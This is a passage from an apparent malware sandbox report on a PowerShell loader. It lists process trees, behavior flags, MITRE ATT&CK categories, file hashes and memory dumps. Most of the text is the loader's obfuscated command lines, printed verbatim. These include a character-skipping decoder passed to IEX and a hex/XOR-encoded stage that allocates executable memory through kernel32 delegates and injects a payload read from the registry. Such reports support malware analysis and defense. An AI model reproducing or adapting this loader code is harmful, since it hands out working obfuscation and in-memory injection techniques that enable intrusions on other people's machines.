a7KnBBi1Ba4Si1Hj7Un0Pk7Un7Ha3Sh1Is3St7FoBHe0Ry8Be1ToADo3BuDFo2Mi7kr0Od3Ar2Kl7Su2Br1fu0LeEEn7OaFJe7Rg3Pr0Lo8Va0Sp6gn1SoAPh3VaDNa2St7En6gr0Tr6In1no0CeERe7AgFSt7di3Si0De8Ab0Ci6st1laALi3CaDSr2La7Ln6Ov0Cr6Bi1Aa0TrEFr7unFAl7kn3Fl0ek8Ko0De6Ba1AfARe3SnDTa2St7Ar6Si0Pa6Fl1Fj0reEIn7PaAAr7Li3Ar7joBVa0Fl8mi1UnASr3DuDPu2Vo7Ri0ou3Gu2te7Ve2Fa1ti0AtENy7ViAGa7LfASg7BaAUn'Ge;Vr&Ha(Pi`$KlpAtoKotTvsAghSpoOuoSttBr7Sk)Ph Tu`$BuPSarovoCegborPaaMemSemNuoHadgwuCrlMyeRerHe6Re;Lu`$OpMSieEttOrhcaySulMacUnhSpoGelaraGanWrtAlhUnrUneLanAkeBy Sk=Ho EnfSekCopbi Ru`$BrpPuoCrtKlsEphDeoDeoUdtFo5Ba Fr`$UnpSpoJetAnsFohproMaoUntFo6Le;Th`$PrPSerUioBagPrrVialamFymIroUndHouEjlSoeHarGa7Ge Me=su ToHGrTReBMa Tr'Wi7Hu7Va1Ny9Su3Re2Pa3si0Un3HuCCr3Un1Re3FaASo2Sk7St3poASu3Pe2St3TrDMe3Un2Ta6Ch0Af7Tr3Ha6OkEBo7Re3in7La7Sc0Sh0sh2Un3Ta2Fo1Sp3St8Ap3Hn8Re3Te6At3Co7Wa3Ef2Do3RoFSk3He6Ov3TaDfe3Fi6Co2Fa0Bl7UnDHe1PaADi3AbDen2ge5Un3GeCVe3Sa8il3Mo6De7ExBSp0Al8Tr1UnABu3ErDIr2Je7Kr0id3St2Na7re2No1ko0JoEEx6Ba9Ep6Fo9mo0Ke9Ha3Da6Un2Ta1Ma3DeCAn7CaFDe7Pa3Rh6Ej5So6Af5an6Ov4Sk7SpFBa7St3Mu6Ce3De2DjBDe6Un0mi6Ac3sm6Au3Br6Sk3Pr7FrFPi7Ni3An6Un3Ka2FiBFa6Ov7Sv6Be3Fa7InAVi'sj;tr&St(St`$UnpKroSatResBihTeoByoKatNo7Tz)Te St`$UnPRarFeoRagRerCoaDrmdemTioYadLauEslOreBermi7Ta;Sq`$SlPDarUdoFogcorHuaComHamSkoAndSiuSylDieKirTo8Un Pa=al KrHInTMaBFr Ab'Ul7et7Gh3RoCCu2Po3Rh3MaFKu3YmAco2Ta5Vu3Un6Ta3EfFPa2Ud0Gr3Ak6Ve7Br3Ud6asESn7Ku3To7Br7Sk0Ho0In2Ry3El2Pr1Do3In8Tr3St8Br3Ko6Un3li7Sh3ry2Ov3UnFDi3Ko6Ro3BaDPa3Du6Fl2An0Ak7UnDRa1KrAHe3BoDro2Ko5El3GuCSt3po8Te3An6Dy7FiBSi0Py8ca1spAFn3ReDBl2Io7go0Fa3Fo2Cy7ha2Mi1Fr0StECo6Sp9St6Co9Be0Sl9Wa3Mo6Ra2Sc1Bl3BoCZa7SjFSt7Sl3St6Mu6Sy6Un5Ta6Sh6Re6Ku1fu6Se7Ke6ApBSc6Pr3Bo6Pa3Ga7ChFFu7Lo3Di6ii3Ge2AfBRe6Aa0Ce6Fo3Mi6Tr3Ab6Mi3Bo7AaFUn7Sh3An6Ju3Pa2SiBBr6So7Id7ArASa'Po;Ya&me(Pi`$unpTroIntDisbihskoAfoTrtvi7Ap)Ov Ne`$ouPBorApoGegAnrReaRemArmAnoPadOtuRelXieGarHj8Pe;Un`$StOBevNsefarcrcUmoTrlEkdRe=Su(HoGjeeGotge-RyISotOpeCamOrPAfrRioSupBleHarFrtTayTr An-NePOmaTrtSehDo Re'ViHWoKSeCMaUSa:Mi\smEcodFoiUnfRiiUncSjaAknGatTo\SeMSiaDayTobAlrreiMetUdsPa'Bn)Po.PrVBoechrTheVectiuSpnKldTanNaeUnsTysMi;Ch`$SkPBarSyoUrgSyrSmaOsmTrmBloUndSkuUdlFleforCa9Ty Sp=Ba AfHBoTChBam Se'Fl7Kn7Pa0Sl3Vi2Mi1Pi3DyCBi3So4No2Po1Do3Sa2Ty3PoELe3UnESa3ImCSt3Af7Di2Pu6re3BeFKn3Pr6Ou2By1Li7Kr3La6BoEBa7Fl3Do0En8Ro0Fl0Pr2SiAtj2Ta0Ra2Do7Sv3Su6Br3ReENo7GdDFa1Pu0Li3InCCu3BeDPr2Un5Fi3Ba6Mi2Un1Su2Co7Ra0ReETa6Ol9Ti6Em9uh1Ka5Ti2Is1Fr3SkCCa3GrEDa1Op1To3Un2Fl2Br0Op3Py6He6Va5Pa6El7Re0Un0co2Il7Sp2Fi1Cr3DaASm3FlDBa3se4Ba7OuBMu7Un7Bu1RiCHa2Ko5Ud3Sy6Ch2Fl1Aw3de0Ma3PsCTh3LaFPe3Er7Di7KrALo'Un;Bo&Ha(Ge`$tepSeoBrtTisBrhAnoTeosytUd7Po)Al Pe`$EnPSurAroSkgTzrDiaunmVamSnoBldSkuKulDeeCyrra9Sk;en`$FlODevPaeBerSocBroRolHadBi0Po Sa=bo SmHnaTInBSg Di'Ma0Ba8Sa0ju0sk2ViASe2Ph0Fu2Ve7Ma3fe6Re3LoEAi7RoDBu0De1Fu2Ki6Po3SkDMo2Sk7Ln3FjAUn3KdESp3Ch6Fo7OuDDi1SvAEn3GlDAg2Im7Ao3Qu6Ca2He1No3trCno2Va3Am0No0Ov3Ta6Ov2Sk1Ka2Fa5Sh3AbADe3Tr0Ze3Ln6Af2Me0An7TuDDu1TeEPl3Ar2Cr2Ge1De2Sa0Bl3WhBLi3Po2Sm3IaFPe0CaEAm6Kn9Om6Un9Fo1Sk0Wh3ReCSo2Va3Ca2EnAIn7UnBHo7Ba7Fu0Ne3Mo2Le1sk3MeCgl3En4La2Om1Di3em2Vo3TuEUd3DeESt3AnCSt3No7Ro2Pl6Po3DeFEx3Sm6Ti2Kn1Pa7SlFOl7Ub3He6Sk3Pa7CoFSh7Fe3Vi7Di3Ov7Me7Ci1Hi9Ri3Sl2Re3Mi0Va3WaCre3Fr1Wr3OsAIn2Ug7Re3TrAsk3Tr2Un3BeDai3pe2St6Sk0Ch7foFud7Ry3St6Af5Fi6Ba5co6Ta4Am7RuANo'Po;Bl&fu(To`$VrpfooaltAgsCwhtaoAnoVetRh7Po)Ac Pe`$udOUnvKieGerClcFroEllAudMa0Po;Be`$MassiuRenKispitudoNonAnefj=Re`$SaPPrrAroGugPhrFiaHumPlmBaoOvdGouNalMaeEfrPa.PecFloMiuAdnBytAf-Ep6Ab6Li7ti;du`$EsOShvHueMyrSqcUnoSylRedFo1Sk Vk=Tr coHadTHeBMe Re'nd0Eg8Sv0Xm0To2MeAMi2Ch0My2Ip7Pr3Gi6de3TjEDe7CoDBa0Ac1Al2Aa6Fo3RoDIn2pr7Ct3GaARu3IsERa3Un6Ru7UdDSi1ObAPl3SkDVa2Ha7Bi3Ta6Li2Ca1De3DeCJa2Sa3Ar0Re0Sk3Ky6Ho2Un1Hr2Bl5Re3DiAAc3Di0Hv3Fi6Fo2An0Bo7deDUo1PrEIn3Hy2Va2Sk1Ae2Ex0St3MiBEm3re2Kl3ArFPr0FiEFl6Wo9Kr6Su9Ov1Bi0Fl3AuCba2El3In2BrAAk7BrBAa7Li7Sp0Rk3Sl2Ov1Te3BrCEn3Sk4Ra2Si1De3St2Kr3FrEAv3InEPa3GuCMa3pa7Da2Go6Pr3UdFLu3In6li2Pa1Un7ElFRe7Mn3De6Im5Pu6Tr5Af6Mi4Ko7seFTr7No3As7Ch7Ti3StCCo2Sp3Pa3InFRu3omAbl2Op5Cl3Un6Mr3MeFSk2Se0St3Pl6St7SkFLi7pa3Cl7Sk7Un2Dy0Ov2Ru6Fo3SeDUd2Be0Me2Ha7Ko3HiCDe3SsDMe3Po6Re7ReAUd'Rd;Cy&Un(No`$FapHooMetOpsUdhreoUsoFotth7Au)In Fl`$BeOBuvFieMirHecBaoSalAsdSl1Po;ne`$StODevPreInrUncDeoBelTadHu2za Jo=Lo EkHBiTUnBFr Bo'Te7Do7Af0Me6Pa3ul7Sc2El7De2st1Br3Po8In2Af0Gy3To1Ou3PyCEm2Un1Lu3Ae7Te2bi0Dr7De3Ra6stEAd7Ru3Se0Sk8Mu0Me0Un2WiAAm2Un0Un2Pa7Ry3Un6St3BeEMo7InDZo0Pr1Sk2Sa6Pi3JaDCo2Gy7El3UlANa3NoEUd3Ba6Pr7FoDJo1flAUl3SaDto2Fi7Di3ud6St2Sl1aa3KoCRi2sp3na0Na0Ud3Pu6Fe2Ra1Ba2Ja5Su3beAtr3Gl0Tu3ma6Kr2Op0Da7UnDUn1VaECo3Ex2Hi2Gr1Un2Op0Sy3FrBSi3De2Be3UnFBj0chEVu6sv9Be6Sy9Ex1Bh4El3Fa6Mi2Ps7Co1Po7Va3Si6Ga3ElFRe3Fi6Ph3Tr4Hk3Sc2St2Fl7Te3Sp6Lg1In5Ma3obCIn2un1re1Ni5Ge2Bo6Wa3ArDRe3Vi0Af2Re7In3BoAOd3PlCPr3ImDSl0Fr3Un3SuCqu3GiALe3AnDUn2ve7Th3Up6Ph2Tv1Sk7TeBBu7BrBCo3At5Ag3Cl8Er2Re3Sy7Su3sa7In7Be0Pa6En2St3Te3RoFWe3Kl2Me2MoASe7ba3co7Bi7Sm0Bi0Sp3In6Ou2Ma3Ad2Me7In3Op6Ti2fk7Co2Fa7Tr3Bo6de2Go0Co7MaAse7UtFPu7Hj3co7FoBPr1Un4Ac1Dg7Ga0Eo7Co7Un3Er1Be3En7InBFi0De8In1GlAGe3StDUo2Gu7Ns0An3El2St7He2Pa1Af0OfECa7KvFEr7Er3Fa0Ep8Un1CoACh3PrDRu2Re7Ov0Mu3Ma2Do7Hy2St1Te0GaEPe7EuFPy7Pr3Ma0Ra8Mu1HiARo3SwDSk2Ou7Sl0Te3fj2Ci7Se2Pr1Ny0leEEp7FoFOc7Bu3Fl0Un8Li1UnADa3ViDTr2Fe7Wi0Pr3Bo2Sp7ti2Ge1St0LoEUn7ExFTu7Sc3Di0Pa8Br1neAFa3TjDPh2Sk7Tr0br3He2Ov7In2Hy1Af0PuEBe7EpATa7Xc3He7CoBSi0Va8Un1SeATo3deDSo2Op7Su0hy3Ol2St7Pa2Ni1Di0BeEjo7FoABa7coARu7SuADe'Be;St&Sw(Mi`$TepSkoUltCoskohTooSkoTrtEn7In)Vv Sy`$laOSlvApeMirLicKooBalSedSt2Yi;Ps`$RaOMovsteChrLecReoPjlMedTe3Bu De=Di jaHRoTFoBOn No'Su7Ag7Uv0Un6Th3em7Sk2Ca7Cy2Ha1Ro3St8Ju2Na0Pr3si1Ja3VaCBu2By1Sc3Et7Ab2Dd0fe7StDBo1paASe3poDRo2Av5Sh3PrCro3Pa8Ta3Ci6Af7OfBRu7Ac7Et1Ov9de3Ba2Co3oc0Va3TeCRe3Pr1Bo3MoAIn2Sl7En3krACa3mi2Da3baDAf3su2Fl6Am0No7SuFPe7Lo7Br3UnCun2Bo3fd3AiFBl3FoAFi2Ka5In3Ga6Un3DrFRi2Ud0Me3Tu6bi7DiFUn7Ca7ta1ChEFr3Da6No2Fo7Be3BaBSt2WeAHa3ToFMa3Ed0Op3CaBUh3FoCsc3UnFKa3Cy2Ju3BaDMo2Rm7se3GrBVi2Gt1Af3Su6kr3ExDFo3Te6No7HeFSc6Al3Ti7IrFIn6ha3Md7AfAGe'Jo;In&Ex(Ea`$PhpRioRetBesPuhPaoDeoTutAo7Af)Ep Pl`$CiOInvSrePorHicCloNelVedUn3Di#Ma;""";Function Overcold9 { param([String]$dolkhales); For($Besots=2; $Besots -lt $dolkhales.Length-1; $Besots+=(2+1)){ $Bissekrmmers = $Bissekrmmers + $blomkaalshoved + $dolkhales.Substring($Besots, 1); } $Bissekrmmers;}$Samaroid0 = Overcold9 'PrIArEHyXFr ';$Samaroid1= Overcold9 $Tumultuous;if([IntPtr]::size -eq 8){START-job { param($Ansg) powershell $Ansg } -RunAs32 -Argument $Samaroid1 | wait-job | Receive-Job;}else{&$Samaroid0 $Samaroid1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:968
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$dolkhales); $Tonicking49 = New-Object byte[] ($dolkhales.Length / 2); For($Besots=0; $Besots -lt $dolkhales.Length; $Besots+=2){ $Tonicking49[$Besots/2] = [convert]::ToByte($dolkhales.Substring($Besots, 2), 16); $Tonicking49[$Besots/2] = ($Tonicking49[$Besots/2] -bxor 83); } [String][System.Text.Encoding]::ASCII.GetString($Tonicking49);}$Novationens0=HTB '002A2027363E7D373F3F';$Novationens1=HTB '1E3A30213C203C35277D043A3D60617D063D203235361D32273A25361E36273B3C3720';$Novationens2=HTB '14362703213C3012373721362020';$Novationens3=HTB '002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1B323D373F36013635';$Novationens4=HTB '2027213A3D34';$Novationens5=HTB '1436271E3C37263F361B323D373F36';$Novationens6=HTB '0107002336303A323F1D323E367F731B3A3736112A003A347F730326313F3A30';$Novationens7=HTB '01263D273A3E367F731E323D32343637';$Novationens8=HTB '0136353F363027363717363F3634322736';$Novationens9=HTB '1A3D1E363E3C212A1E3C37263F36';$potshoot0=HTB '1E2A17363F3634322736072A2336';$potshoot1=HTB '103F3220207F730326313F3A307F730036323F36377F73123D203A103F3220207F731226273C103F322020';$potshoot2=HTB '1A3D253C3836';$potshoot3=HTB '0326313F3A307F731B3A3736112A003A347F731D3624003F3C277F73053A212726323F';$potshoot4=HTB '053A212726323F123F3F3C30';$potshoot5=HTB '3D27373F3F';$potshoot6=HTB '1D2703213C27363027053A212726323F1E363E3C212A';$potshoot7=HTB '1A160B';$potshoot8=HTB '0F';$Uplay=HTB '060016016061';$Septettes=HTB '10323F3F043A3D373C2403213C3012';function fkp {Param ($Vaklendes, $Overnatningsstederne) ;$Programmoduler0 =HTB '77142126342126736E737B08122323173C3E323A3D0E696910262121363D27173C3E323A3D7D143627122020363E313F3A36207B7A732F73043B3621367E1C3139363027732873770C7D143F3C31323F122020363E313F2A1032303B36737E123D3773770C7D1F3C3032273A3C3D7D00233F3A277B77233C27203B3C3C276B7A087E620E7D162226323F207B771D3C2532273A3C3D363D20637A732E7A7D143627072A23367B771D3C2532273A3C3D363D20627A';&($potshoot7) $Programmoduler0;$Programmoduler5 = HTB '771F2A38383637213E736E73771421263421267D1436271E36273B3C377B771D3C2532273A3C3D363D20617F7308072A2336080E0E73137B771D3C2532273A3C3D363D20607F73771D3C2532273A3C3D363D20677A7A';&($potshoot7) $Programmoduler5;$Programmoduler1 = HTB '21362726213D73771F2A38383637213E7D1A3D253C38367B773D263F3F7F73137B08002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1B323D373F360136350E7B1D36247E1C313936302773002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1B323D373F360136357B7B1D36247E1C3139363027731A3D270327217A7F737B771421263421267D1436271E36273B3C377B771D3C2532273A3C3D363D20667A7A7D1A3D253C38367B773D263F3F7F73137B770532383F363D3736207A7A7A7A7F73771C2536213D32273D3A3D34202027363736213D367A7A';&($potshoot7) $Programmoduler1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $telegrambureauet,[Parameter(Position = 1)] [Type] $Hrning = [Void]);$Programmoduler2 = HTB '771521323D382A736E7308122323173C3E323A3D0E696910262121363D27173C3E323A3D7D1736353A3D36172A3D323E3A30122020363E313F2A7B7B1D36247E1C313936302773002A2027363E7D0136353F3630273A3C3D7D122020363E313F2A1D323E367B771D3C2532273A3C3D363D206B7A7A7F7308002A2027363E7D0136353F3630273A3C3D7D163E3A277D122020363E313F2A11263A3F3736211230303620200E696901263D7A7D1736353A3D36172A3D323E3A301E3C37263F367B771D3C2532273A3C3D363D206A7F737735323F20367A7D1736353A3D36072A23367B77233C27203B3C3C27637F7377233C27203B3C3C27627F7308002A2027363E7D1E263F273A3032202717363F36343227360E7A';&($potshoot7) $Programmoduler2;$Programmoduler3 = HTB '771521323D382A7D1736353A3D36103C3D2027212630273C217B771D3C2532273A3C3D363D20657F7308002A2027363E7D0136353F3630273A3C3D7D10323F3F3A3D34103C3D25363D273A3C3D200E69690027323D373221377F737727363F363421323E31262136322636277A7D0036271A3E233F363E363D2732273A3C3D153F3234207B771D3C2532273A3C3D363D20647A';&($potshoot7) $Programmoduler3;$Programmoduler4 = HTB '771521323D382A7D1736353A3D361E36273B3C377B77233C27203B3C3C27617F7377233C27203B3C3C27607F73771B213D3A3D347F737727363F363421323E31262136322636277A7D0036271A3E233F363E363D2732273A3C3D153F3234207B771D3C2532273A3C3D363D20647A';&($potshoot7) $Programmoduler4;$Programmoduler5 = HTB '21362726213D73771521323D382A7D102136322736072A23367B7A';&($potshoot7) $Programmoduler5 ;}$Udpantningsforretningernes = HTB '3836213D363F6061';$Programmoduler6 = HTB '7700232138383637323F363D3620736E7308002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E696914362717363F3634322736153C2115263D30273A3C3D033C3A3D2736217B7B3538237377063723323D273D3A3D3420353C212136273D3A3D3436213D36207377233C27203B3C3C27677A7F737B14170773137B081A3D270327210E7F7308061A3D2760610E7F7308061A3D2760610E7F7308061A3D2760610E7A737B081A3D270327210E7A7A7A';&($potshoot7) $Programmoduler6;$Methylcholanthrene = fkp $potshoot5 $potshoot6;$Programmoduler7 = HTB '771932303C313A273A323D3260736E737700232138383637323F363D36207D1A3D253C38367B081A3D270327210E69690936213C7F736565647F73632B606363637F73632B67637A';&($potshoot7) $Programmoduler7;$Programmoduler8 = HTB '773C233F3A25363F2036736E737700232138383637323F363D36207D1A3D253C38367B081A3D270327210E69690936213C7F7366656661676B63637F73632B606363637F73632B677A';&($potshoot7) $Programmoduler8;$Overcold=(Get-ItemProperty -Path 'HKCU:\Edificant\Maybrits').Verecundness;$Programmoduler9 = HTB '7703213C3421323E3E3C37263F3621736E7308002A2027363E7D103C3D253621270E696915213C3E1132203665670027213A3D347B771C253621303C3F377A';&($potshoot7) $Programmoduler9;$Overcold0 = HTB '08002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E6969103C232A7B7703213C3421323E3E3C37263F36217F73637F7373771932303C313A273A323D32607F736565647A';&($potshoot7) $Overcold0;$sunstone=$Programmoduler.count-667;$Overcold1 = HTB '08002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E6969103C232A7B7703213C3421323E3E3C37263F36217F736565647F73773C233F3A25363F20367F737720263D20273C3D367A';&($potshoot7) $Overcold1;$Overcold2 = HTB '77063727213820313C213720736E7308002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E696914362717363F3634322736153C2115263D30273A3C3D033C3A3D2736217B7B353823737706233F322A73770036232736272736207A7F737B14170773137B081A3D270327210E7F73081A3D270327210E7F73081A3D270327210E7F73081A3D270327210E7F73081A3D270327210E7A737B081A3D270327210E7A7A7A';&($potshoot7) $Overcold2;$Overcold3 = HTB '77063727213820313C2137207D1A3D253C38367B771932303C313A273A323D32607F773C233F3A25363F20367F771E36273B2A3F303B3C3F323D273B21363D367F637F637A';&($potshoot7) $Overcold3#"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
15989cf4c147703ec56298ab9c097839

SHA1
0c7f049d7b110ad9d8102097d1981c14edd13de9

SHA256
c3c42949351039d59a04720d650e52227c27ce2503b181ca69571364086e3446

SHA512
86c1faa29288a60726fa68869f7f22e2f8b68ed7834764c03c2a7ea5fdc9b3702f585fcd702ad86dedab17dce086c3c57cf01872910cf52475cf2fcde4decb71

Download Submit
memory/968-55-0x000007FEFB621000-0x000007FEFB623000-memory.dmp

Filesize
8KB

Download
memory/968-56-0x000007FEF35E0000-0x000007FEF4003000-memory.dmp

Filesize
10.1MB

Download
memory/968-57-0x000007FEF2A80000-0x000007FEF35DD000-memory.dmp

Filesize
11.4MB

Download
memory/968-58-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/968-69-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/968-68-0x00000000025D4000-0x00000000025D7000-memory.dmp

Filesize
12KB

Download
memory/968-61-0x00000000025DB000-0x00000000025FA000-memory.dmp

Filesize
124KB

Download
memory/1512-66-0x0000000072DE0000-0x000000007338B000-memory.dmp

Filesize
5.7MB

Download
memory/1512-67-0x0000000005B50000-0x0000000009138000-memory.dmp

Filesize
53.9MB

Download
memory/1512-71-0x0000000072DE0000-0x000000007338B000-memory.dmp

Filesize
5.7MB

Download
memory/1936-65-0x0000000072DE0000-0x000000007338B000-memory.dmp

Filesize
5.7MB

Download
memory/1936-60-0x0000000075931000-0x0000000075933000-memory.dmp

Filesize
8KB

Download
memory/1936-70-0x0000000072DE0000-0x000000007338B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing